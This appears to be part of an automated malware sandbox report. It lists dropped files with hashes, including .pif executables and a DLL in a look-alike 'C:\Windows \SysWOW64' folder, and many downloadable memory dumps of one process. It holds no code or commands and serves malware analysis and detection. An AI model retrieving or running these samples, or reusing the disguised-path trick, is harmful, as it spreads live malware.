ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9

Download Submit
C:\Users\Public\xkn.pif

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \SysWOW64\netutils.dll

Filesize
116KB

MD5
a88976a70aed45f610a032e438a82a95

SHA1
ec20b0f0d6ccc848c8ffa857ab4e771672dfa4f2

SHA256
f3d5a6ebcd8cab3cc9a98488b23c2de740c6ef04e33ed317a3e2a047d53d169b

SHA512
ec77bb81b9e6de4af8a17eb26281d10fc9a05947d588f2ee3680ada67ed28118fbc9a2d0e63bf0ecc2a4c318555a4f27e72ecf1a530a506e9b4fbf5efdb4f676

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
memory/3224-19-0x0000019FD8F00000-0x0000019FD8F22000-memory.dmp

Filesize
136KB

Download
memory/3892-115-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-101-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-97-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-107-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-133-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-131-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-130-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-129-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-128-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-127-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-126-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-125-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-124-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-123-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-122-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-120-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-119-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-118-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-117-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-116-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-85-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-114-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-113-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-111-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-110-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-109-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-108-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-106-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-105-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-104-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-102-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-99-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-100-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-98-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-132-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-96-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-95-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-94-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-121-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-93-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-92-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-91-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-90-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-112-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-88-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-83-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-82-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-81-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-80-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-89-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-78-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-84-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-77-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-76-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-74-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-103-0x0000000000400000-0x00000000004D9000-memory.dmp

Filesize
868KB

Download
memory/3892-86-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-87-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-79-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-75-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-73-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-68-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/3892-67-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download